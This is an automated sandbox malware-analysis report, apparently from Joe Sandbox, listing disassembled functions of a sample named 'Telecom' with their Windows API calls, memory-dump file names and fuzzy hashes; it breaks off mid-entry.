Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: d63a582e05d28c7701fe5703e4d2b4ef960597d3001836c6dbd7a133c467ecfb
Instruction ID: eef543355a1cfe27b8fc053ae8960fca58da57423f32be497f369a1d6adee249
Opcode Fuzzy Hash: d63a582e05d28c7701fe5703e4d2b4ef960597d3001836c6dbd7a133c467ecfb
Instruction Fuzzy Hash: E9514D35A002159FDB05DF55C881AAEBBF5FF49318F04809AE949AB362CB39ED41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004D75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 004D766B
SetWindowLongW.USER32(?,000000EC,?), ref: 004D7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004D76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004BB5BE,00000000,00000000), ref: 004D76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004D76FF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: c376d341df9eb2f999f6b357ebc602e9aa10fdd75a166b60de6eacc34a159873
Instruction ID: a33e6017c3545bb02b50108e253c8077fa885457fcd8319ebd66fc45a31d74ce
Opcode Fuzzy Hash: c376d341df9eb2f999f6b357ebc602e9aa10fdd75a166b60de6eacc34a159873
Instruction Fuzzy Hash: 0A41E335A08504AFD7248F2CCC68FAA7B65EB05360F150267F914A73E0F774ED51DA58

Uniqueness

Uniqueness Score: -1.00%

Function 004723C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00472433
_free.LIBCMT ref: 00472453

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: be8d7145cbcaa3e8f59e0bc2a49805076113a87d1a36bfe0745d3d2f1804df31
Instruction ID: 8bbe52eb40ba4299c962700914884019fe711016b99c572bb259653a5b728804
Opcode Fuzzy Hash: be8d7145cbcaa3e8f59e0bc2a49805076113a87d1a36bfe0745d3d2f1804df31
Instruction Fuzzy Hash: F341E432A002109FCB20DF78C980A9EB3F1EF89314F15856AE519EB351E775AD01CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004A224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004A2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 004A230E
Sleep.KERNEL32(00000000,?,?,?), ref: 004A2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 004A2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004A232F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: b50b8b6bfcb6d81073c257d437b555397b1e520d6c6258fbdd80f49f685a841e
Instruction ID: 9a578452e2f548045e5beed27270b010950b20a28247f407698d25196c0792eb
Opcode Fuzzy Hash: b50b8b6bfcb6d81073c257d437b555397b1e520d6c6258fbdd80f49f685a841e
Instruction Fuzzy Hash: FE31D172900219EFDB04CFACCE88BDE3BB5EB16315F00426AF921A72D0C3B49940DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004D61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 004D61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 004D623C
_wcslen.LIBCMT ref: 004D624E
_wcslen.LIBCMT ref: 004D6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 004D62B5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 4e3daa5b9910c8b79368502e307c6f72845637e43cdfcc8a6af99b5130533a8f
Instruction ID: 204f635a0dea1847145479c76095eb158c7aa495e8a452ddb3c021f28e596a63
Opcode Fuzzy Hash: 4e3daa5b9910c8b79368502e307c6f72845637e43cdfcc8a6af99b5130533a8f
Instruction Fuzzy Hash: C1218571900218AADF10DF54CC84AEE77B8FF55314F10425BF925EA381D7789985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004C138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004C13AE
GetForegroundWindow.USER32 ref: 004C13C5
GetDC.USER32(00000000), ref: 004C1401
GetPixel.GDI32(00000000,?,00000003), ref: 004C140D
ReleaseDC.USER32(00000000,00000003), ref: 004C1445

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: a2fcfe0b518f23d5b1e220210dc6a432e0c3769f9f059c9a7aa1770eb2e35fd4
Instruction ID: 42a77e1fda4d94f880a5740f657d637e735e354e8d5bac7dd6120242c4d148a2
Opcode Fuzzy Hash: a2fcfe0b518f23d5b1e220210dc6a432e0c3769f9f059c9a7aa1770eb2e35fd4
Instruction Fuzzy Hash: 13218135A01204AFD744EF66CC94E9EBBF5EF49304B04847EE85A97761CA74EC00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0047D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0047D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047D169

Part of subcall function 00473B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00466A79,?,0000015D,?,?,?,?,004685B0,000000FF,00000000,?,?), ref: 00473BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0047D18F
_free.LIBCMT ref: 0047D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047D1B1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 688ba978c874135e8e5c36015c6671887aa4954198340fd7eea7a897c1297745
Instruction ID: 216d026092d9d18eec0685507cebeba2488655f40cb4a17ad82d8a261bcd8675
Opcode Fuzzy Hash: 688ba978c874135e8e5c36015c6671887aa4954198340fd7eea7a897c1297745
Instruction Fuzzy Hash: C601B172E126157F23212A7A5C88CBB6B7DDEC2B61354822BBC08C2244DA688C0281B9

Uniqueness

Uniqueness Score: -1.00%

Function 0047316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,0046F64E,0046545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00473170
_free.LIBCMT ref: 004731A5
_free.LIBCMT ref: 004731CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004731D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004731E2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c26327496d50573e5507c62482ddf8c8bccf199a0f11d790d6455d5dbb3778e7
Instruction ID: d88e88351cecf3d32936d21e80f6b5aaa1ffff9f4ea77e876bf9ce4e5dc41448
Opcode Fuzzy Hash: c26327496d50573e5507c62482ddf8c8bccf199a0f11d790d6455d5dbb3778e7
Instruction Fuzzy Hash: 070149726816007BD7222E359C85EEB2768EBC0377760842FF81C92281EE6D8A02712D

Uniqueness

Uniqueness Score: -1.00%

Function 004A08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?,?,004A0C4E), ref: 004A091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?), ref: 004A0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0960

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c8ecad4a8e2cb275643c2d45e04cb18570a34a7c294badd25f30e943d2ebc89e
Instruction ID: 64a706823b5ab6468b18424bc140bbea556763f260ec84a5ce6f248c2c88f500
Opcode Fuzzy Hash: c8ecad4a8e2cb275643c2d45e04cb18570a34a7c294badd25f30e943d2ebc89e
Instruction Fuzzy Hash: BC01FDB2A01204BFEB015F54CC04B9B7FBDEF88792F100026F905E2212E774DD00ABA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 004AF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 004AF2BC
Sleep.KERNEL32(00000000), ref: 004AF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 004AF2CE
Sleep.KERNEL32 ref: 004AF30A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: ecdde332dfdebd6b73433f54d98584a8a3d01495f649c897a50c6c96b80e46b7
Instruction ID: 43c0487f0fcd40e055d79d4c8b741c045ae2da2fde767def7613f0bc28ec186c
Opcode Fuzzy Hash: ecdde332dfdebd6b73433f54d98584a8a3d01495f649c897a50c6c96b80e46b7
Instruction Fuzzy Hash: 4B016D71C02519EBDF00AFE4DD49AEEBB78FF1A700F010467D902B2250DB349558C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004B0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CCB
CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CD8
CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CE5
CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CF2
CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CFF
CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0D0C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 963ea111f20d26849d0ec2da498a678271ce7e73ec36a482884c26d05ef6cfd4
Instruction ID: 7f2cd332a41419585fa7c64b654620e9ff0301e03c2ba265b729ba1215a7b2f3
Opcode Fuzzy Hash: 963ea111f20d26849d0ec2da498a678271ce7e73ec36a482884c26d05ef6cfd4
Instruction Fuzzy Hash: 7301DC71800B05CFCB30AFA6D880857FBF9BE502163108A3FD09652A31C7B0A848DE94

Uniqueness

Uniqueness Score: -1.00%

Function 004A65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 004A65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 004A65D6
MessageBeep.USER32(00000000), ref: 004A65EE
KillTimer.USER32(?,0000040A), ref: 004A660A
EndDialog.USER32(?,00000001), ref: 004A6624

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 744c90d8d083de8f4d6568aeaad268c6235e870d4d55333aeb7dc9019b9c49b4
Instruction ID: 1ed3daa2e21214d6c4cb0d4e8b86d6deb81e96349bf982a125b7e770d1491f05
Opcode Fuzzy Hash: 744c90d8d083de8f4d6568aeaad268c6235e870d4d55333aeb7dc9019b9c49b4
Instruction Fuzzy Hash: 75018130D41304ABEB205F20DD4EB967BB8FF15705F05066FA186A10E1DBF8AA448A99

Uniqueness

Uniqueness Score: -1.00%

Function 00472610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0047262E

Part of subcall function 00472D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4), ref: 00472D4E
Part of subcall function 00472D38: GetLastError.KERNEL32(00511DC4,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4,00511DC4), ref: 00472D60

_free.LIBCMT ref: 00472640
_free.LIBCMT ref: 00472653
_free.LIBCMT ref: 00472664
_free.LIBCMT ref: 00472675

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8a3b82d3982e71f230b2921ef820c504326d02ad999652f3800838179a5493ee
Instruction ID: 90709a9db929e749a55c25f8e617ab8a29fe25711724c7418d262c2924be719f
Opcode Fuzzy Hash: 8a3b82d3982e71f230b2921ef820c504326d02ad999652f3800838179a5493ee
Instruction Fuzzy Hash: 76F03A74802520CBC712AF95ED018CE3BA4BB34754701D94BF42892276C7BD095ABFAC

Uniqueness

Uniqueness Score: -1.00%

Function 004712B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00471469
__freea.LIBCMT ref: 00471487

Part of subcall function 004718A7: _free.LIBCMT ref: 004718BF

Strings

a/p, xrefs: 0047154E
am/pm, xrefs: 004714EA

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 40d4121d6a0851d50a6b13ae811411a5d6154d97297b79b9764b571a1852f237
Instruction ID: 6359b29ab1899e70f07c433dd213cc0643cf037abe338ead6fc9e8b754c31007
Opcode Fuzzy Hash: 40d4121d6a0851d50a6b13ae811411a5d6154d97297b79b9764b571a1852f237
Instruction Fuzzy Hash: 6AD1D3759102069BDB289FACC8956FBB7B1FF05700F28815BE90A9B370D23D9D41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004C5231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 004B41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4229
Part of subcall function 004B41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 004C5419
VariantInit.OLEAUT32(?), ref: 004C550E
VariantClear.OLEAUT32(?), ref: 004C55CD

Strings

bnJ, xrefs: 004C54ED, 004C55E4

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bnJ
API String ID: 2854431205-3647285499
Opcode ID: dbddf68dd46aad359d230f5c5d6492f87bf7820eb2f89d6eb6589127920407b8
Instruction ID: 54db4de94b094e1a8bf91e7183c30134d73b7be36a97a17b1d2e540a30f0f6ed
Opcode Fuzzy Hash: dbddf68dd46aad359d230f5c5d6492f87bf7820eb2f89d6eb6589127920407b8
Instruction Fuzzy Hash: CBD15C749002499FDB44DF95C890FEEBBB4FF18308F54805EE406AB292DB39A986CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0044CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0044D253

Strings

t5Q, xrefs: 0044CFC8
t5Q, xrefs: 0044D23A
t5Q, xrefs: 0044CFCF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5Q$t5Q$t5Q
API String ID: 1385522511-950353684
Opcode ID: 2a528e8a1b3bc7f78d8ad21ddced09b8f233816a2e234c99401e8f38552b6595
Instruction ID: 9a112eb753d64cf26868fdbb47d0920da20524cda1f98526b8954336ba7b7e23
Opcode Fuzzy Hash: 2a528e8a1b3bc7f78d8ad21ddced09b8f233816a2e234c99401e8f38552b6595
Instruction Fuzzy Hash: 32914875E00206CFDB14CF59C4906AABBF2FF59304F24816AD945AB340E739EA82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004C61A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 004C623D
_wcslen.LIBCMT ref: 004C6249

Strings

CALLARGARRAY, xrefs: 004C6243, 004C6248
bnJ, xrefs: 004C61B1, 004C62E1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bnJ
API String ID: 157775604-2983707253
Opcode ID: 94c068d4b38ae4778083f7644e1a71830aac06683dcd7fbae8f4794e319f2d7c
Instruction ID: 242e29474204f01558bfc27e24b46cd2cb0c4535c47660e7336aa7502d99ed93
